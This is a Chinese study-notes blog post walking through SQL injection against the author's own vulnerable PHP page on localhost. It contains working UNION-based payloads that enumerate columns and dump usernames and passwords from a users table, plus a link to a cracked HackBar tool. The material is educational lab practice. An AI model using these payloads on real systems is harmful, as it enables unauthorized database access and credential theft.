Sql注入实战篇

学习笔记—Sql注入实战篇

一、编写注入的网页,用于实战。
index.php
在这里插入图片描述
在这里插入图片描述
link.php
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在老板火狐中开启hackbar, 进行sql注入。
在这里插入图片描述
Google中hackbar破解方法:
https://www.fujieace.com/hacker/tools/hackbar.html
在这里插入图片描述
二、Sql注入基本流程(实战篇):

输入单引号报如下错误
在这里插入图片描述
1=1与1=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否存在sql注入漏洞
构造 ?id=5 and 1=1 ,回车
在这里插入图片描述
页面返回正常
构造 ?id=5 and 1=2 ,回车
在这里插入图片描述
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
http://127.0.0.1/7-27/index.php
?id=5)order by 1–+
–+注释语句,具体分析可参考下列文章:
https://blog.csdn.net/xiayun1995/article/details/86500605
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
输入1,2,3,4可以正常显示,输入5则报错:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
第三步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
在这里插入图片描述
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查询当前数据库密码
在这里插入图片描述
拿到了密码
http://www.91ri.org/1551.html(万能密码实战)
在这里插入图片描述
在这里插入图片描述
http://127.0.0.1/7-27/index.php
?id=1 union select column_name,2,3,4 from information_schema.columns where table_schema=database()
在这里插入图片描述
http://127.0.0.1/7-27/index.php
?id=1 UNION SELECT 1,group_concat(user,0x3a,pass),3,4 from jokedb.users
在这里插入图片描述
在这里插入图片描述
至此,破解密码完成。

了解更多请关注下列公众号:
在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值